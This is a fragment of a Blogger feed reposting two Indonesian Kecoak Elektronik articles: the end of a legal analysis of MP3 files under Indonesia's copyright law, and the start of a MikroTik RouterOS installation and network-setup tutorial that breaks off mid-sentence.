cipta dapat&lt;br /&gt;kembali dipandang dari dua sisi yaitu form dan substance-nya. Dari sisi&lt;br /&gt;form-nya perlindungan hak cipta ditujukan pada MP3 sebagai software,&lt;br /&gt;sehingga MP3 memenuhi unsur sebagai Program Komputer sebagaimana dimaksud&lt;br /&gt;dalam Pasal 1 angka 8 Undang-undang Nomor 19 Tahun 2002 Tentang Hak&lt;br /&gt;Cipta (UUHC) yaitu:&lt;br /&gt;&lt;br /&gt;Program Komputer adalah sekumpulan instruksi yang diwujudkan dalam&lt;br /&gt;bentuk bahasa, kode, skema, ataupun bentuk lain, yang apabila digabungkan  &lt;br /&gt;dengan media yang dapat dibaca  dengan komputer akan mampu membuat&lt;br /&gt;komputer bekerja untuk melakukan fungsi-fungsi khusus atau untuk mencapai&lt;br /&gt;hasil yang khusus, termasuk persiapan dalam merancang instruksi-instruksi&lt;br /&gt;tersebut. Dengan terpenuhinya unsur MP3 sebagai program komputer / software,&lt;br /&gt;maka MP3 menjadi objek perlindungan dari hak cipta sebagaimana dimaksud&lt;br /&gt;dalam Pasal 12 ayat (1) huruf a UUHC, yaitu:&lt;br /&gt;&lt;br /&gt;Pasal  12&lt;br /&gt;(1) Dalam Undang-undang ini Ciptaan yang dilindungi adalah Ciptaan&lt;br /&gt;dalam bidang  ilmu pengetahuan, seni, dan sastra, yang mencakup:&lt;br /&gt;&lt;br /&gt;a. buku, Program Komputer, pamflet, perwajahan (lay out) karya&lt;br /&gt;   tulis yang diterbitkan, dan semua hasil karya tulis lain;&lt;br /&gt;&lt;br /&gt;Ketentuan ini berbeda dengan ketentuan yang berlaku di Amerika, dimana&lt;br /&gt;MP3 dilindungi dengan paten, yaitu dengan adanya software patent. Di&lt;br /&gt;Indonesia, sebuah program komputer bukan merupakan objek paten, hal ini&lt;br /&gt;berdasarkan Penjelasan Atas Undang-undang Tentang Paten yang menyebutkan&lt;br /&gt;sebagai berikut.&lt;br /&gt;&lt;br /&gt;Invensi tidak mencakup:&lt;br /&gt;(1) kreasi estetika;&lt;br /&gt;(2) skema;&lt;br /&gt;(3) aturan dan metode untuk melakukan kegiatan:&lt;br /&gt;a. yang melibatkan kegiatan mental,&lt;br /&gt;b. permainan,&lt;br /&gt;c. bisnis;&lt;br /&gt;(4) aturan dan metode mengenai program komputer;  [cetak tebal dari penulis]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dengan demikian, MP3 bukan merupakan objek perlindungan paten sehingga&lt;br /&gt;tidak bisa dipatenkan di Indonesia. Selanjutnya, perlindungan apa yang&lt;br /&gt;tepat untuk melindungi MP3 secara form-nya sebagai software? Seperti&lt;br /&gt;yang telah diuraikan sebelumnya, perlindungan hukum yang tepat bagi MP3&lt;br /&gt;sebagai software adalah dengan mekanisme hak cipta. Apabila terjadi&lt;br /&gt;pelanggaran hak cipta seperti memperbanyak software MP3 atau&lt;br /&gt;mendistribusikan software tersebut tanpa izin Pencipta atau Pemegang&lt;br /&gt;Lisensi MP3 tersebut dan untuk tujuan komersial dapat diterapkan&lt;br /&gt;ketentuan dalam Pasal 72 ayat (3) UUHC yaitu:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(3)   Barangsiapa dengan sengaja dan tanpa hak memperbanyak penggunaan&lt;br /&gt;untuk kepentingan komersial suatu Program Komputer dipidana&lt;br /&gt;dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda&lt;br /&gt;paling banyak Rp 500.000.000,00 (lima ratus juta rupiah).&lt;br /&gt;&lt;br /&gt;Akan tetapi, apabila perbanyakan software MP3 tersebut untuk&lt;br /&gt;tujuan membuat salinan cadangan program MP3 tersebut dan semata-mata untuk&lt;br /&gt;tujuan pribadi, maka perbuatan demikian bukanlah perbuatan yang melanggar&lt;br /&gt;hak cipta, hal ini berdasarkan ketentuan yang tercantum dalam Pasal 15&lt;br /&gt;huruf g UUHC.&lt;br /&gt;&lt;br /&gt;Selanjutnya, bagaimana perlindungan hak cipta terhadap substance atau&lt;br /&gt;isi dari MP3? Telah dijelaskan, isi atau konten dari MP3 lazimnya berisi&lt;br /&gt;lagu atau musik. Sebuah lagu atau musik dapat dikategorikan sebagai&lt;br /&gt;karya seni, dan berdasarkan Pasal 12 ayat (1) huruf d sebagai berikut.&lt;br /&gt;&lt;br /&gt;Pasal  12&lt;br /&gt;&lt;br /&gt;(1) Dalam Undang-undang ini Ciptaan yang dilindungi adalah Ciptaan&lt;br /&gt;dalam bidang ilmu pengetahuan, seni, dan sastra, yang mencakup:&lt;br /&gt;a. ...&lt;br /&gt;b. ...&lt;br /&gt;c. ...&lt;br /&gt;d. lagu atau musik dengan atau tanpa teks;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MP3 yang banyak beredar di Indonesia memiliki konten lagu-lagu atau&lt;br /&gt;musik bajakan berasal dari CD orisinal yang di-ripping  kemudian&lt;br /&gt;dikompilasi menjadi satu CD yang berisi data MP3 yang memiliki konten&lt;br /&gt;musin atau lagu digital. Dalam proses ini terjadi pengalihwujudan&lt;br /&gt;karya seni dari analog menjadi digital, pengalihwujudan lagu atau&lt;br /&gt;musik analog menjadi digital menyebabkan semakin mudahnya proses&lt;br /&gt;penyalinan musik atau lagu digital dari satu media ke media lainnya.&lt;br /&gt;Pengalihwujudan suatu karya cipta untuk tujuan komersil yang&lt;br /&gt;dilindungi oleh hak cipta harus berdasarkan izin dari Pencipta atau&lt;br /&gt;Pemegang Hak Cipta, sehingga apabila proses pengalihwujudan lagu atau&lt;br /&gt;musik menjadi lagu atau musik digital tanpa seizin dari Pencipta atau&lt;br /&gt;Pemegang Hak Cipta, hasil konversi tersebut dianggap telah melanggar&lt;br /&gt;hak cipta, hal ini disebabkan, proses pengalihwujudan atau konversi&lt;br /&gt;dari suatu karya cipta sudah merupakan proses perbanyakan dari karya&lt;br /&gt;cipta itu sendiri. Berdasarkan Pasal 2 ayat (1) UUHC dikatakan sebagai&lt;br /&gt;berikut.&lt;br /&gt;&lt;br /&gt;Hak Cipta merupakan hak eksklusif bagi Pencipta atau Pemegang Hak&lt;br /&gt;Cipta untuk mengumumkan atau memperbanyak Ciptaannya, yang timbul&lt;br /&gt;secara otomatis setelah suatu ciptaan dilahirkan tanpa mengurangi&lt;br /&gt;pembatasan menurut peraturan perundang-undangan yang berlaku.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dengan demikian, apabila pengalihwujudan yang menyebabkan adanya&lt;br /&gt;perbanyakan terhadap suatu ciptaan tanpa izin dari pencipta atau&lt;br /&gt;pemegang hak cipta, tindakan tersebut dapat memenuhi unsur tindak&lt;br /&gt;pidana sebagaimana diatur dalam Pasal 72 ayat (1) UUHC yaitu sebagai&lt;br /&gt;berikut.&lt;br /&gt;&lt;br /&gt;Barangsiapa dengan sengaja dan tanpa hak melakukan perbuatan sebagai&lt;br /&gt;mana dimaksud dalam Pasal 2 ayat (1) atau Pasal 49 ayat (1) dan ayat (2)&lt;br /&gt;dipidana dengan pidana penjara  masing-masing paling singkat 1 (satu)&lt;br /&gt;bulan dan/atau denda paling sedikit Rp 1.000.000,00 (satu juta rupiah),&lt;br /&gt;atau pidana penjara paling lama 7 (tujuh) tahun dan/atau denda paling&lt;br /&gt;banyak Rp 5.000.000.000,00 (lima miliar rupiah).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Berdasarkan uraian sebelumnya, dapat disimpulkan, di Indonesia,&lt;br /&gt;meskipun MP3 tidak bisa dilindungi dengan Hak Paten, MP3 baik secara&lt;br /&gt;form maupun secara substansinya telah mendapat perlindungan hukum&lt;br /&gt;yaitu dengan adanya perlindungan terhadap hak cipta dari ciptaan MP3&lt;br /&gt;tersebut. Permasalahan terkait MP3 illegal di Indonesia yang lebih&lt;br /&gt;banyak terjadi adalah pengalihwujudan musik dan lagu yang menyebabkan&lt;br /&gt;terjadinya perbanyakan ciptaan tanpa seizin pencipta atau pemegang&lt;br /&gt;hak cipta. Sedangkan permasalahan hak cipta terkain form dari software&lt;br /&gt;MP3 itu sendiri tidak banyak terjadi, hal ini antara lain disebabkan&lt;br /&gt;software MP3 memang dilisensikan sebagai free software yang artinya&lt;br /&gt;diperbolehkan untuk didistribusikan atau di salinkan secara gratis.&lt;br /&gt;Salah satu solusi untuk menekan laju peredaran MP3 illegal selain&lt;br /&gt;penegakan hukum adalah menyediakan MP3 legal dengan harga bersaing.&lt;br /&gt;Harga yang bersaing didapat karena penjualan MP3 legal secara online&lt;br /&gt;dapat memangkas jalur distrbusi. Perusahaan rekaman di Indonesia dapat&lt;br /&gt;meniru mekanisme penjualan MP3 yang telah dilakukan oleh iTuns, AllOfMP3,&lt;br /&gt;Tunster, dan lainnya. Diharapkan dengan adanya MP3 legal dengan harga&lt;br /&gt;bersaing, pebajakan di Indonesia dapat direduksi seminimal mungkin.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Zka &lt;zka@kecoak-elektronik.net&gt;&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;Copyleft Unreserved by Law 1995 - 2007 Kecoak Elektronik Indonesia&lt;br /&gt;http://www.kecoak-elektronik.net&lt;br /&gt;&lt;/zka@kecoak-elektronik.net&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-4771326021494623848?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/4771326021494623848'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/4771326021494623848'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2007/06/analisis-permasalahan-hukum-terhadap.html' title='Analisis Permasalahan Hukum Terhadap Mp3'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-1982925339333467280</id><published>2007-06-19T13:28:00.000+07:00</published><updated>2007-07-05T12:40:41.912+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mikrotik'/><title type='text'>Instalasi, Konfigurasi dan Optimasi Mikrotik RouterOS</title><content type='html'>&lt;pre style="font-family: verdana;"&gt;&lt;span style="font-size:78%;"&gt;####################################################################&lt;br /&gt;TOKET - Terbitan Online Kecoak Elektronik&lt;br /&gt;Defending the classical hackers mind since 1995&lt;br /&gt;&lt;br /&gt;Publisher : http://www.kecoak-elektronik.net&lt;br /&gt;Contact   : staff@kecoak-elektronik.net&lt;br /&gt;####################################################################&lt;br /&gt;&lt;br /&gt;Subject   : Instalasi, Konfigurasi dan Optimasi Mikrotik RouterOS&lt;br /&gt;Writer    : r0t0r of Kecoak Elektronik&lt;br /&gt;Contact   : rotor@kecoak-elektronik.net&lt;br /&gt;Style     : Unicode Transformation Format (UTF-8)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[1]-- Kecoak Elektronik License&lt;br /&gt;&lt;br /&gt;Kecoak Elektronik secara aktif mendukung Blue Ribbon Campaign.&lt;br /&gt;Kami akan berusaha untuk menerbitkan semua informasi yang kami anggap&lt;br /&gt;patut diketahui, baik dokumen teks, artikel majalah, atau surat kabar.&lt;br /&gt;Seluruh kredit akan diberikan kepada sang pengarang.&lt;br /&gt;&lt;br /&gt;Kecoak Elektronik tidak bertanggung jawab atas tindakan orang lain.&lt;br /&gt;Informasi yang disajikan di situs ini adalah untuk tujuan pendidikan&lt;br /&gt;dan informasionil belaka. Jika Anda memutuskan untuk mengejawantahkan&lt;br /&gt;dalam bentuk apapun informasi yang tersimpan di situs ini, Anda&lt;br /&gt;melakukan atas keputusan sendiri, dan tidak seorangpun selain Anda&lt;br /&gt;bertanggung jawab atas tindakan tersebut.&lt;br /&gt;&lt;br /&gt;Dipersilahkan untuk mengambil sebagian atau seluruh dari isi artikel&lt;br /&gt;yang kami terbitkan dengan tetap mencantumkan kredit atas pengarang&lt;br /&gt;dan Kecoak Elektronik sebagai penerbit online. Artikel yang dikutip&lt;br /&gt;atau diambil tidak dapat dipergunakan untuk kepentingan komersil.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[2]-- Intro&lt;br /&gt;&lt;br /&gt;MikroTik RouterOS™, merupakan system operasi Linux base yang diperuntuk&lt;br /&gt;kan sebagai network router. Didesain untuk memberikan kemudahan bagi&lt;br /&gt;penggunanya. Administrasinya bisa dilakukan melalui Windows application&lt;br /&gt;(WinBox). Webbrowser serta via Remote Shell (telnet dan SSH). Selain&lt;br /&gt;itu instalasi dapat dilakukan pada Standard computer PC. PC yang akan&lt;br /&gt;dijadi kan router mikrotikpun tidak memerlukan resource yang cukup besar&lt;br /&gt;untuk penggunaan standard, misalnya hanya sebagai gateway. Untuk keperluan&lt;br /&gt;beban yang besar ( network yang kompleks, routing yang rumit dll)&lt;br /&gt;disarankan untuk mempertimbangkan pemilihan resource PC yang memadai.&lt;br /&gt;&lt;br /&gt;Fasilitas pada mikrotik antara lain sebagai berikut :&lt;br /&gt;- Protokoll routing RIP, OSPF, BGP.&lt;br /&gt;- Statefull firewall&lt;br /&gt;- HotSpot for Plug-and-Play access&lt;br /&gt;- remote winbox GUI admin&lt;br /&gt;&lt;br /&gt;Lebih lengkap bisa dilihat di www.mikrotik.com.&lt;br /&gt;&lt;br /&gt;Meskipun demikian Mikrotik bukanlah free software, artinya kita harus&lt;br /&gt;membeli licensi terhadap segala fasiltas yang disediakan. Free trial&lt;br /&gt;hanya untuk 24 jam saja. Kita bisa membeli software mikrotik dalam&lt;br /&gt;bentuk CD yang diinstall pada Hard disk atau disk on module (DOM).&lt;br /&gt;Jika kita membeli DOM tidak perlu install tetapi tinggal menancapkan&lt;br /&gt;DOM pada slot IDE PC kita.&lt;br /&gt;&lt;br /&gt;Instalasi Mikrotik ada beberapa cara :&lt;br /&gt;1. Instalasi melalui NetInstall via jaringan&lt;br /&gt;2. Instalasi melalui Floppy disk&lt;br /&gt;3. Instalasi melalui CD-ROM.&lt;br /&gt;&lt;br /&gt;Kali ini kita akan membahasnya instalasi melalui CD-ROM. Untuk percobaan&lt;br /&gt;ini silahkan download ISOnya di http://adminpreman.web.id/download&lt;br /&gt;&lt;br /&gt;Langkah-langkah berikut adalah dasar-dasar setup mikrotik yang&lt;br /&gt;dikonfigurasikan untuk jaringan sederhana sebagai PC Router/Gateway,&lt;br /&gt;Web Proxy, DNS Server, DHCP, Firewall serta Bandwidth Management.&lt;br /&gt;Konfigurasi ini dapat dimanfaatkan untuk membangun jaringan pada&lt;br /&gt;Internet Cafe atau untuk Testing pada Laboratorium Pribadi.&lt;br /&gt;&lt;br /&gt;--[2.1]-- Topologi Jaringan&lt;br /&gt;&lt;br /&gt;Topologi jaringan ini di anggap koneksi Internetnya melalui MODEM&lt;br /&gt;xDSL (ADSL atau SDSL). Dengan catatan konfigurasi IP Publiknya&lt;br /&gt;ditanam didalam MODEM, artinya perlu pula dipilih MODEM yang memiliki&lt;br /&gt;fasilitas seperti Routing, Firewall, dan lain-lain. Semakin lengkap&lt;br /&gt;semakin bagus, namun biasanya harga semakin mahal, yang patut&lt;br /&gt;dipertimbangkan pilihlah MODEM yang memiliki fasilitas Firewall yang&lt;br /&gt;bagus.&lt;br /&gt;&lt;br /&gt;Untuk MODEM SDSL, biasanya, IP dibawah NAT, artinya IP nya bukan IP&lt;br /&gt;Publik langsung. Dan umumnya untuk MODEM ADSL, IP Publiknya langsung&lt;br /&gt;ditanam di MODEM itu sendiri.&lt;br /&gt;&lt;br /&gt;Saat ini kita anggap IP Publiknya di tanam di MODEM, dimana Interface&lt;br /&gt;PPPoE nya sudah di konfigurasikan dan sudah bisa DIAL ke server RASnya.&lt;br /&gt;&lt;br /&gt;Agar memudahkan konfigurasi, perlu dirancang topologi jaringan yang&lt;br /&gt;dikonfigurasi. Sebagai contoh, skema dibawah ini:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;(a) Skema Jaringan&lt;br /&gt;&lt;br /&gt;            _(&lt;br /&gt;o--+      ____| &lt;br /&gt; |     /    |  Telpon&lt;br /&gt; |   _/     -(&lt;br /&gt; +--[_] Splitter&lt;br /&gt;     |&lt;br /&gt;     |   +----+&lt;br /&gt;     +---|    | Modem xDSL&lt;br /&gt;         +--*-+&lt;br /&gt;         (1)|             +---+&lt;br /&gt;            |             |   |   (3)&lt;br /&gt;            |             |  +|---------+ &lt;br /&gt;            |   +-----+   |  |. . . . . |&lt;br /&gt;            |  a|     |   |  +--|-|-|-|-+&lt;br /&gt;            +---|=====|   |     | | | |&lt;br /&gt;                |     |   |     | | | |&lt;br /&gt;                |     |---+     +-|-|-|--[client 1]&lt;br /&gt;                |     |b          +-|-|------------[client 2]&lt;br /&gt;                |     |             +-|----------------------[client 3]&lt;br /&gt;                L-----J               +--------[client n]&lt;br /&gt;                  (2)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Keterangan skema&lt;br /&gt;(1) = Modem xDSL (Ip Address : 192.168.1.1/24)&lt;br /&gt;(2) = Mikrotik Box dengan 2 ethernet card yaitu a (publik) dan b (local)&lt;br /&gt;(3) = Switch&lt;br /&gt;    Untuk sambungan ke Client. Asumsi Client Jumlahnya 20 Client&lt;br /&gt;    Range Ip Address : 192.168.0.0/27&lt;br /&gt;    Alokasi Ip Client = 192.168.0.1-192.168.0.30&lt;br /&gt;                        Ip Net ID    : 192.168.0.0/27&lt;br /&gt;                        Ip Broadcast : 192.168.0.31/27&lt;br /&gt;&lt;br /&gt;             &lt;br /&gt;(b) Alokasi IP Address&lt;br /&gt;&lt;br /&gt;[*] Mikrotik Box&lt;br /&gt;&lt;br /&gt;  Keterangan Skema&lt;br /&gt;  a = ethernet card 1 (Publik) -&gt; Ip Address : 192.168.1.2/24&lt;br /&gt;  b = ethernet card 2 (Local)  -&gt; Ip Address : 192.168.0.30/27&lt;br /&gt;&lt;br /&gt;  Gateway    : 192.168.1.1 (ke Modem)&lt;br /&gt;&lt;br /&gt;[*] Client &lt;br /&gt;  Client 1 - Client n, Ip Address : 192.168.0.n .... n (1-30)&lt;br /&gt;&lt;br /&gt;  Contoh:&lt;br /&gt;  Client 6&lt;br /&gt;  Ip Address : 192.168.0.6/27&lt;br /&gt;  Gateway    : 192.168.0.30 (ke Mikrotik Box)&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;CATATAN :&lt;br /&gt;Angka dibelakang Ip address ( /27) sama dengan nilai netmasknya&lt;br /&gt;untuk angka (/27) nilainya sama dengan 255.255.255.224.&lt;br /&gt;&lt;br /&gt;Untuk Sub Netmask blok ip address Local kelas C, dapat diuraikan&lt;br /&gt;sebagai berikut :&lt;br /&gt;&lt;br /&gt;Subnetmask kelas C&lt;br /&gt;-------------------&lt;br /&gt;255.255.255.0   = 24 -&gt; 254 mesin&lt;br /&gt;   ..    .128 = 25 -&gt; 128 mesin&lt;br /&gt;   ..    .192 = 26 -&gt;  64 mesin&lt;br /&gt;   ..    .224 = 27 -&gt;  32 mesin&lt;br /&gt;   ..    .240 = 28 -&gt;  16 mesin&lt;br /&gt;   ..    .248 = 29 -&gt;   8 mesin&lt;br /&gt;   ..    .252 = 30 -&gt;   4 mesin&lt;br /&gt;   ..    .254 = 31 -&gt;   2 mesin&lt;br /&gt;   ..    .255 = 32 -&gt;   1 mesin&lt;br /&gt;&lt;br /&gt;--[2.2]-- Persiapan&lt;br /&gt;&lt;br /&gt;- Untuk PC Router Siapkan PC, minimal Pentium I, RAM 64, HD 500M&lt;br /&gt;atau pake flash memory 64 - Sebagai Web proxy, Siapkan PC, minimal&lt;br /&gt;Pentium III 450Mhz, RAM 256 Mb, HD 20 Gb.  Melihat berapa minimum&lt;br /&gt;RAM dan HD yang dibutuhkan untuk Cache Silahkan lihat&lt;br /&gt;http://adminpreman.web.id/download/Rumus%20Web%20Proxy%20Mikrotik.xls&lt;br /&gt;&lt;br /&gt;- Siapkan minimal 2 ethernet card, 1 ke arah luar/Internet dan 1&lt;br /&gt;lagi ke Network local&lt;br /&gt;– Burn Source CD Mikrotik OS masukan ke CDROM.&lt;br /&gt;- Versi mikrotik yang digunakan adalah Mikrotik RouterOS versi 2.9.27&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[3]-- Installasi Mikrotik Router&lt;br /&gt;Setelah desain skema jaringan serta perangkat yang dibutuhkan telah&lt;br /&gt;disiapkan, sekarang saatnya kita mulai proses instalasi ini.&lt;br /&gt;&lt;br /&gt;--[3.1]-- Booting melalui CD-ROM&lt;br /&gt;&lt;br /&gt; Atur di BIOS agar, supaya boot lewat CD-ROM, kemudian tunggu beberapa&lt;br /&gt; saat di monitor akan muncul proses Instalasi.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;ISOLINUX 2.08 2003-12-12 Copyrigth (C) 1994-2003 H. Peter Anvin&lt;br /&gt;Loading linux..................&lt;br /&gt;Loading initrd.rgz.............&lt;br /&gt;Ready&lt;br /&gt;Uncompressing Linux... Ok, booting the kernel&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;--[3.2]-- Memilih paket software&lt;br /&gt;&lt;br /&gt; Setelah proses booting akan muncul menu pilihan software yang&lt;br /&gt; mau di install, pilih sesuai kebutuhan yang akan direncanakan.&lt;br /&gt;&lt;br /&gt; Paket yang tersedia di Mikrotik&lt;br /&gt;&lt;br /&gt; advanced-tools-2.9.27.npk&lt;br /&gt; arlan-2.9.27.npk&lt;br /&gt; dhcp-2.9.27.npk&lt;br /&gt; gps-2.9.27.npk&lt;br /&gt; hotspot-2.9.27.npk&lt;br /&gt; hotspot-fix-2.9.27.npk&lt;br /&gt; isdn-2.9.27.npk&lt;br /&gt; lcd-2.9.27.npk&lt;br /&gt; ntp-2.9.27.npk&lt;br /&gt; ppp-2.9.27.npk&lt;br /&gt; radiolan-2.9.27.npk&lt;br /&gt; routerboard-2.9.27.npk&lt;br /&gt; routing-2.9.27.npk&lt;br /&gt; routing-test-2.9.27.npk&lt;br /&gt; rstp-bridge-test-2.9.27.npk&lt;br /&gt; security-2.9.27.npk&lt;br /&gt; synchronous-2.9.27.npk&lt;br /&gt; system-2.9.27.npk&lt;br /&gt; telephony-2.9.27.npk&lt;br /&gt; ups-2.9.27.npk&lt;br /&gt; user-manager-2.9.27.npk&lt;br /&gt; web-proxy-2.9.27.npk&lt;br /&gt; webproxy-test-2.9.27.npk&lt;br /&gt; wireless-2.9.27.npk&lt;br /&gt; wireless-legacy-2.9.27.npk&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;      Welcome to Mikrotik Router Software Installation&lt;br /&gt;&lt;br /&gt;Move around menu using 'p' and 'n' or arrow keys, select with 'spacebar'.&lt;br /&gt;Select all with 'a', minimum with 'm'. Press 'i' to install locally or 'r' to&lt;br /&gt;install remote router or 'q' to cancel and reboot.&lt;br /&gt;&lt;br /&gt;[X] system             [ ] lcd                 [ ] telephony&lt;br /&gt;[ ] ppp                [ ] ntp                 [ ] ups&lt;br /&gt;[ ] dhcp               [ ] radiolan            [ ] user-manager&lt;br /&gt;[X] andvanced-tools    [ ] routerboard         [X] web-proxy&lt;br /&gt;[ ] arlan              [ ] routing             [ ] webproxy-test&lt;br /&gt;[ ] gps                [ ] routing-test        [ ] wireless&lt;br /&gt;[ ] hotspot            [ ] rstp-bridge-test    [ ] wireless-legacy&lt;br /&gt;[ ] hotspot            [X] security         &lt;br /&gt;[ ] isdn               [ ] synchronous&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Umumnya Paket Mikrotik untuk Warnet, Kantor atau SOHO adalah :&lt;br /&gt;&lt;br /&gt;a. SYSTEM           : Paket ini merupakan paket dasar, berisi Kernel dari&lt;br /&gt;                    Mikrotik&lt;br /&gt;&lt;br /&gt;b. DHCP             : Paket yang berisi fasilitas sebagai DHCP Server, DHCP&lt;br /&gt;                    client, pastikan memilih paket ini jika Anda menginginkan&lt;br /&gt;                    agar Client diberikan IP address otomatis dari DHCP Server&lt;br /&gt; &lt;br /&gt;c. SECURITY         : Paket ini berisikan fasilitas yang mengutamakan Keamanan&lt;br /&gt;                    jaringan, seperti Remote Mesin dengan SSH, Remote via MAC&lt;br /&gt;                    Address&lt;br /&gt;&lt;br /&gt;d. WEB-PROXY        : Jika Anda memilih paket ini, maka Mikrotik Box anda telah&lt;br /&gt;                    dapat menjalan service sebagai Web proxy yang akan menyimpan&lt;br /&gt;                    cache agar traffik ke Internet dapat di reduksi serta browsing&lt;br /&gt;                    untuk Web dapat dipercepat.&lt;br /&gt;&lt;br /&gt;e. ADVANCED TOOLS   : Paket yang berisi Tool didalam melakukan Admnistrasi jaringan,&lt;br /&gt;                    seperti Bandwidth meter, Scanning, Nslookup, dan lain sebagainya.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[3.3]-- Instalasi Paket&lt;br /&gt;&lt;br /&gt;ketik "i" setelah selesai memilih software, lalu akan muncul menu&lt;br /&gt; pilihan seperti ini :&lt;br /&gt;&lt;br /&gt; - Do you want to keep old configuration ? [y/n] ketik Y&lt;br /&gt; - continue ? [y/n] ketik Y&lt;br /&gt;&lt;br /&gt; Setelah itu proses installasi system dimulai, disini kita tidak&lt;br /&gt; perlu membuat partisi hardsik karena secara otomatis mikrotik akan&lt;br /&gt; membuat partisi sendiri.&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;wireless-legacy (depens on system):&lt;br /&gt;Provides support for Cisco Aironet cards and for PrismlI and Atheros wireless&lt;br /&gt;station and AP.&lt;br /&gt;&lt;br /&gt;Do you want to keep old configuraion? [y/n]:y&lt;br /&gt;&lt;br /&gt;Warning: all data on the disk will be erased!&lt;br /&gt;&lt;br /&gt;Continue? [y/n]:y&lt;br /&gt;&lt;br /&gt;Creating partition..........&lt;br /&gt;Formatting disk.......................................&lt;br /&gt;&lt;br /&gt;Installing system-2.9.27 [##################                ]&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Proses installasi&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Continue? [y/n]:y&lt;br /&gt;&lt;br /&gt;Creating partition.......................&lt;br /&gt;Formatting disk............................&lt;br /&gt;&lt;br /&gt;Installed system-2.9.27&lt;br /&gt;Installed advanced-tools-2.9.27&lt;br /&gt;Installed dhcp-2.9.27&lt;br /&gt;Installed security-2.9.27&lt;br /&gt;installed web-proxy-2.9.27&lt;br /&gt;&lt;br /&gt;Software installed.&lt;br /&gt;Press ENTER to reboot&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;CATATAN :&lt;br /&gt;Proses Installasi normalnya tidak sampai 15 menit, jika lebih berarti gagal,ulangi&lt;br /&gt;ke step awal. Setelah proses installasi selesai maka kita akan diminta untuk&lt;br /&gt;merestart system, tekan enter untuk merestart system.&lt;br /&gt;&lt;br /&gt;--[3.5]-- Proses Check system disk&lt;br /&gt;&lt;br /&gt;Setelah komputer booting kembali ke system mikrotik, akan ada pilihan untuk&lt;br /&gt;melakukan check system disk, tekan "y".&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;Loading system with initrd&lt;br /&gt;Uncompressing Linux... Ok, booting the kernel.&lt;br /&gt;Starting.&lt;br /&gt;&lt;br /&gt;It is recomended to check your disk drive for error,&lt;br /&gt;but it may take while (~1min for 1Gb).&lt;br /&gt;It can be done later with "/system check-disk".&lt;br /&gt;Do you want to do it now? [y/n]&lt;br /&gt;-----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;--[3.6]-- Proses Instalasi Selesai&lt;br /&gt;&lt;br /&gt;Setelah proses instalasi selesai, maka akan muncul menu login dalam modus&lt;br /&gt;terminal, kondisi sistem saat ini dalam keadaan default.&lt;br /&gt;&lt;br /&gt; Mikrotik login = admin&lt;br /&gt; Password = (kosong, enter saja)&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Mikrotik 2.9.27&lt;br /&gt;Mikrotik Login:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;MMM      MMM       KKK                          TTTTTTTTTTT      KKK&lt;br /&gt;MMMM    MMMM       KKK                          TTTTTTTTTTT      KKK&lt;br /&gt;MMM MMMM MMM  III  KKK  KKK  RRRRRR     OOOOOO      TTT     III  KKK  KKK&lt;br /&gt;MMM  MM  MMM  III  KKKKK     RRR  RRR  OOO  OOO     TTT     III  KKKKK&lt;br /&gt;MMM      MMM  III  KKK KKK   RRRRRR    OOO  OOO     TTT     III  KKK KKK&lt;br /&gt;MMM      MMM  III  KKK  KKK  RRR  RRR   OOOOOO      TTT     III  KKK  KKK&lt;br /&gt;&lt;br /&gt;MikroTik RouterOS 2.9.27 (c) 1999-2005       http://www.mikrotik.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Terminal vt102 detected, using multiline input mode&lt;br /&gt;[admin@Mikrotikl] &gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;CATATAN :&lt;br /&gt;Konfigurasi Standar untuk mikrotik ada 2 modus, yaitu modus teks dan&lt;br /&gt;modus GUI. Modus Gui ada 2 